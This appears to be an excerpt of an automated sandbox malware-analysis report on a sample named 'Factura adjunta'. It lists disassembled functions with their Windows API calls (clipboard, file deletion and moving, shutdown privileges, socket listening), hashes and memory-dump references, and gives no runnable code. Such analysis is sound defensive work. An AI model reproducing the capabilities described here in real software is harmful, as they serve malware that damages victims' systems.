                            • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 0083DA8B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                            • String ID: h)
                            • API String ID: 830902736-3328819710
                            • Opcode ID: 21dc28ca842fff7d169202787863aae42cd4ed68133a06ba231444240b4b6707
                            • Instruction ID: f8c5e25acf246c254bdd180296c9e80777a043800c50fe4275cd624b2cd3c909
                            • Opcode Fuzzy Hash: 21dc28ca842fff7d169202787863aae42cd4ed68133a06ba231444240b4b6707
                            • Instruction Fuzzy Hash: 06B16871A00229EFDF14CF69DA857BD7BB1FF84701F088169ED48DA296D734A990CB90
                            Function 00824458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                            • String ID:
                            • API String ID: 1737998785-0
                            • Opcode ID: 71b8636df8b8141ab5419d7446595beeb638cb04fbb139061ec96bccab20e623
                            • Instruction ID: 00ad54ee56cc695b667b5d41f001c0635f584997625e5c43acb7a48b5e25a6c1
                            • Opcode Fuzzy Hash: 71b8636df8b8141ab5419d7446595beeb638cb04fbb139061ec96bccab20e623
                            • Instruction Fuzzy Hash: 16219135701620DFDB10AF24EC09B6A7BA8FF54710F108416FA46DB2B2DB74AD41CB95
                            Function 00813A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B48A1,?,?,007B37C0,?), ref: 007B48CE
                              • Part of subcall function 00814CD3: GetFileAttributesW.KERNEL32(?,00813947), ref: 00814CD4
                            • FindFirstFileW.KERNEL32(?,?), ref: 00813ADF
                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00813B87
                            • MoveFileW.KERNEL32(?,?), ref: 00813B9A
                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00813BB7
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00813BD9
                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00813BF5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                            • String ID: \*.*
                            • API String ID: 4002782344-1173974218
                            • Opcode ID: 16adb9d76b21b1b922846511ab88e7ce577c587c06498a0e548f483677399979
                            • Instruction ID: ec1c4a35a560cd7c8af07bd3e3ea331c6ea7cd17f9efc089670ee7558e2fd78b
                            • Opcode Fuzzy Hash: 16adb9d76b21b1b922846511ab88e7ce577c587c06498a0e548f483677399979
                            • Instruction Fuzzy Hash: 52517D3180514CAACF15EBA0CE96AEDB77DBF54310F2441A9E442B7192EF346F49CBA1
                            Function 007C4140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID: ERCP$Oa|$VUUU$VUUU$VUUU$VUUU
                            • API String ID: 0-607458673
                            • Opcode ID: 35413d4ece04a31f9802d98dee19fe21ca92d0ff0e25df748cd0e26e9aa43a2f
                            • Instruction ID: f227c353e7e342e3619464ca4694b78ffd6fa6bd7292b2e7338b1eecdb34353d
                            • Opcode Fuzzy Hash: 35413d4ece04a31f9802d98dee19fe21ca92d0ff0e25df748cd0e26e9aa43a2f
                            • Instruction Fuzzy Hash: 3DA26E70E0421ACBDF28CF58C9A0BBDB7B1BB54314F2481AED955A7384E7789E81CB51
                            Function 0083C27C Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 149nativewindowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                              • Part of subcall function 007B2344: GetCursorPos.USER32(?), ref: 007B2357
                              • Part of subcall function 007B2344: ScreenToClient.USER32(008767B0,?), ref: 007B2374
                              • Part of subcall function 007B2344: GetAsyncKeyState.USER32(00000001), ref: 007B2399
                              • Part of subcall function 007B2344: GetAsyncKeyState.USER32(00000002), ref: 007B23A7
                            • ReleaseCapture.USER32 ref: 0083C2F0
                            • SetWindowTextW.USER32(?,00000000), ref: 0083C39A
                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0083C3AD
                            • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 0083C48F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$h)
                            • API String ID: 973565025-406163080
                            • Opcode ID: 4ae54e8e091d9a4c22e3aeb7c69e80b5dc0c39b4a8556f73e5ec869185227989
                            • Instruction ID: aa0af757cbcc6dbbd58ca5a20fb9205a5bcb4e9ad981f39b8cb681f782e5a776
                            • Opcode Fuzzy Hash: 4ae54e8e091d9a4c22e3aeb7c69e80b5dc0c39b4a8556f73e5ec869185227989
                            • Instruction Fuzzy Hash: 2A518E70204304EFD704EF24C85AFAA7BE5FB88314F04892DF665972A2DB759958CB92
                            Function 0081F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B7F41: _memmove.LIBCMT ref: 007B7F82
                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0081F6AB
                            • Sleep.KERNEL32(0000000A), ref: 0081F6DB
                            • _wcscmp.LIBCMT ref: 0081F6EF
                            • _wcscmp.LIBCMT ref: 0081F70A
                            • FindNextFileW.KERNEL32(?,?), ref: 0081F7A8
                            • FindClose.KERNEL32(00000000), ref: 0081F7BE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                            • String ID: *.*
                            • API String ID: 713712311-438819550
                            • Opcode ID: ac844355c9b2d42553a8e3103f81c5ce1a7aa9aa054c72e1bb0a0408c06a5889
                            • Instruction ID: d505b300ab487e3d69118d9321039185c7d8a01d77441a894159347ea502c539
                            • Opcode Fuzzy Hash: ac844355c9b2d42553a8e3103f81c5ce1a7aa9aa054c72e1bb0a0408c06a5889
                            • Instruction Fuzzy Hash: A6415F7190025A9FCF15DF64CC89AEEBBB8FF05310F144966E915E22A2DB349E84CB90
                            Function 0080EB07 Relevance: 11.1, APIs: 1, Strings: 6, Instructions: 561stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0080EB19
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: lstrlen
                            • String ID: ($AddRef$InterfaceDispatch$QueryInterface$Release$|
                            • API String ID: 1659193697-2318614619
                            • Opcode ID: 51a69d7ae3eba790db69616c4de03fb26783f189e782988b51d620bd98724987
                            • Instruction ID: 4d86582bdb4d4cca9c20437b4d6cc3e905bb71a841e0bb0ef0530246bc2a6547
                            • Opcode Fuzzy Hash: 51a69d7ae3eba790db69616c4de03fb26783f189e782988b51d620bd98724987
                            • Instruction Fuzzy Hash: 18324775A00605DFD768CF19C891A6AB7F0FF48320B15C86EE59ADB7A2DB70E941CB40
                            Function 007C58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: f5f60d22931ee09ba2718704aaadb57943043b6abc994c7643a27e878a1b381d
                            • Instruction ID: 4a462de0b6cab85dae29875736872f7273a15bef99fc24cd8d24b9140ee676ea
                            • Opcode Fuzzy Hash: f5f60d22931ee09ba2718704aaadb57943043b6abc994c7643a27e878a1b381d
                            • Instruction Fuzzy Hash: ED126770A00609EFDF14DFA5D985BAEB7B5FF48300F10816DE406E6291EB3AAD51CB51
                            Function 007C5680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007D0FF6: std::exception::exception.LIBCMT ref: 007D102C
                              • Part of subcall function 007D0FF6: __CxxThrowException@8.LIBCMT ref: 007D1041
                            • _memmove.LIBCMT ref: 0080062F
                            • _memmove.LIBCMT ref: 00800744
                            • _memmove.LIBCMT ref: 008007EB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                            • String ID: yZ|
                            • API String ID: 1300846289-3179676164
                            • Opcode ID: 0cc25d731a8f6ab09b6057881f44a1a35c80769f73dbdee09d6824514c0923e8
                            • Instruction ID: d05ab2d84428e92abf3e06ead422556e6dfa0a5acaec92662fdea4bbfe578c77
                            • Opcode Fuzzy Hash: 0cc25d731a8f6ab09b6057881f44a1a35c80769f73dbdee09d6824514c0923e8
                            • Instruction Fuzzy Hash: 70028EB0A00209DFDF44DF64D985BAEBBB5FF44300F14806DE806DB295EB39AA54CB91
                            Function 0081545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00808CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00808D0D
                              • Part of subcall function 00808CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00808D3A
                              • Part of subcall function 00808CC3: GetLastError.KERNEL32 ref: 00808D47
                            • ExitWindowsEx.USER32(?,00000000), ref: 0081549B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                            • String ID: $@$SeShutdownPrivilege
                            • API String ID: 2234035333-194228
                            • Opcode ID: 0d58aa56a8087b724bc8c0b4268145e81c9fe830c832c279ae23d710d66c5fc6
                            • Instruction ID: d69890751a4e883dfae31772b5fad5e474ed154561c7a32f65a8b13ac58d1670
                            • Opcode Fuzzy Hash: 0d58aa56a8087b724bc8c0b4268145e81c9fe830c832c279ae23d710d66c5fc6
                            • Instruction Fuzzy Hash: F20124B1A54A05EAE7685278DC4ABFA725CFF80352F200430FD07D21D3DAB01CC08198
                            Function 007C3190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: __itow__swprintf
                            • String ID: Oa|
                            • API String ID: 674341424-2714924062
                            • Opcode ID: 47f0b03910d0b0db40b97456a32c02da5c4cc80f768e12d4a0ed0d2d71244d0f
                            • Instruction ID: 3ca842c502af59494dee0f087e9aaa9fd9ff7714005dca85dbe1dec2462664c1
                            • Opcode Fuzzy Hash: 47f0b03910d0b0db40b97456a32c02da5c4cc80f768e12d4a0ed0d2d71244d0f
                            • Instruction Fuzzy Hash: A1228A71608341DFD724DF24C885BAAB7E4BF84710F10891DFA9697391EB79EA04CB92
                            Function 00826596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                            Download Yara Rule
                            APIs
                            • socket.WS2_32(00000002,00000001,00000006), ref: 008265EF
                            • WSAGetLastError.WS2_32(00000000), ref: 008265FE
                            • bind.WS2_32(00000000,?,00000010), ref: 0082661A
                            • listen.WS2_32(00000000,00000005), ref: 00826629
                            • WSAGetLastError.WS2_32(00000000), ref: 00826643
                            • closesocket.WS2_32(00000000), ref: 00826657
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ErrorLast$bindclosesocketlistensocket
                            • String ID:
                            • API String ID: 1279440585-0
                            • Opcode ID: 5f844726ee6dc636b699804e0f555adc7251ba51b8fd6f116bb33011477c3f95
                            • Instruction ID: 1bb11f226da2bcc8790b679f4dc15592a00a7f8bfdab9e36f40e3ac00b66fa06
                            • Opcode Fuzzy Hash: 5f844726ee6dc636b699804e0f555adc7251ba51b8fd6f116bb33011477c3f95
                            • Instruction Fuzzy Hash: 6821C130600214AFCB10AF24D849B6EB7A9FF44320F148569EA16E73D2DB30AD50CB91
                            Function 0083C788 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83nativewindowCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                            • GetCursorPos.USER32(?), ref: 0083C7C2
                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007EBBFB,?,?,?,?,?), ref: 0083C7D7
                            • GetCursorPos.USER32(?), ref: 0083C824
                            • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,007EBBFB,?,?,?), ref: 0083C85E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                            • String ID: h)
                            • API String ID: 1423138444-3328819710
                            • Opcode ID: dbd275942cc500affbbdc6c16e5fb151fc87a67c462f84ff3cb3d91c646e09f7
                            • Instruction ID: ae747a8688d3f2738aef9cca3958b5cedf49e5fa09a4456c58571b375cf1a603
                            • Opcode Fuzzy Hash: dbd275942cc500affbbdc6c16e5fb151fc87a67c462f84ff3cb3d91c646e09f7
                            • Instruction Fuzzy Hash: 1A318035600018AFCB15CF58C898EEA7BB6FB89311F044169F909DB262D7359E61DFA0
                            Function 007B1287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                            • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 007B19FA
                            • GetSysColor.USER32(0000000F), ref: 007B1A4E
                            • SetBkColor.GDI32(?,00000000), ref: 007B1A61
                              • Part of subcall function 007B1290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 007B12D8
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ColorDialogNtdllProc_$LongWindow
                            • String ID:
                            • API String ID: 591255283-0
                            • Opcode ID: bd780af21d08242c272af7712a5dcc66fc36b63317e7b38ad8320fbaae6f4627
                            • Instruction ID: 9c24a47f599b0cedde25a4636971c424701697a97a4894063c689b334b249687
                            • Opcode Fuzzy Hash: bd780af21d08242c272af7712a5dcc66fc36b63317e7b38ad8320fbaae6f4627
                            • Instruction Fuzzy Hash: 34A17BB11065C4BAD628AB394C7CFFF3B5DEB85385FE44119F402E6196DA2CED1182B2
                            Function 00826A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 008280A0: inet_addr.WS2_32(00000000), ref: 008280CB
                            • socket.WS2_32(00000002,00000002,00000011), ref: 00826AB1
                            • WSAGetLastError.WS2_32(00000000), ref: 00826ADA
                            • bind.WS2_32(00000000,?,00000010), ref: 00826B13
                            • WSAGetLastError.WS2_32(00000000), ref: 00826B20
                            • closesocket.WS2_32(00000000), ref: 00826B34
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
